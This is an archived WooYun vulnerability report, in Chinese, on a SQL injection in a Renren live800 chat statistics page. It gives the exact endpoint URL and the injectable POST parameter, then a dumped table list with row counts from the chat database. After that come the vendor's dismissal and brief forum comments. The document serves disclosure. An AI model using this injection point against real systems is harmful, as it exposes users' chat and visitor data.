人人网某处SQL注入影响大量数据

admin

140559
文章

117
评论

2017年5月3日01:46:50评论395 views字数 211阅读0分42秒阅读模式

摘要

2016-06-23：细节已通知厂商并且等待厂商处理中
2016-06-24：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(5) 关注此漏洞

缺陷编号： WooYun-2016-222273

漏洞标题：人人网某处SQL注入影响大量数据

漏洞作者：路人甲

提交时间： 2016-06-23 12:21

公开时间： 2016-06-24 12:19

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： Mysql

0人收藏

漏洞详情

披露状态：

2016-06-23：细节已通知厂商并且等待厂商处理中
2016-06-24：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

code 区域

http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)
 
 export=txt&companyId=1&subStrSql=*

dba权限

code 区域

Database: live800_im
 +---------------------+---------+
 | Table               | Entries |
 +---------------------+---------+
 | visitor_access      | 15081675 |
 | operator_status     | 633129  |
 | chat_topic          | 616252  |
 | live800_system      | 410676  |
 | chat_content        | 289363  |
 | chat_sta            | 289308  |
 | chat_info           | 285963  |
 | leaveword_topic     | 161506  |
 | trustful_visitor    | 78942   |
 | leaveword           | 74624   |
 | contact             | 71702   |
 | cookie_contact      | 71702   |
 | company_config_data | 69254   |
 | lost                | 51034   |
 | sync_info           | 23170   |
 | op_chat_content     | 7200    |
 | daily_flow_capacity | 1329    |
 | sys_operate_log     | 1266    |
 | faq                 | 115     |
 | operator            | 82      |
 | privilege           | 82      |
 | company_config      | 36      |
 | user_defined_button | 18      |
 | company_ui_config   | 16      |
 | config_template     | 12      |
 | user_invite         | 12      |
 | company_skill       | 11      |
 | ad_column           | 10      |
 | routing_action      | 6       |
 | chat_config         | 4       |
 | leaveword_box       | 3       |
 | notify              | 3       |
 | routing_condition   | 3       |
 | routing_policy      | 3       |
 | routing_rule        | 3       |
 | canned_url          | 1       |
 | company             | 1       |
 | company_style       | 1       |
 | customization       | 1       |
 | fuf                 | 1       |
 | ip_prohibit         | 1       |
 | operator_account    | 1       |
 +---------------------+---------+

漏洞证明：

修复方案：

改改改

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-06-24 12:19

厂商回复：

忽略

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-06-23 13:45 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

0

又有新裤子出来了。。

1# 回复此人
2016-06-23 16:26 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低，根本轮不到去拼...)

0

......跟我的重复了

2# 回复此人
2016-06-24 14:20 | 寒 ( 路人 | Rank:0 漏洞数:1 | 1)

0

.

3# 回复此人

漏洞概要 关注数(5) 关注此漏洞

缺陷编号： WooYun-2016-222273

漏洞标题： 人人网某处SQL注入影响大量数据

相关厂商： 人人网

漏洞作者： 路人甲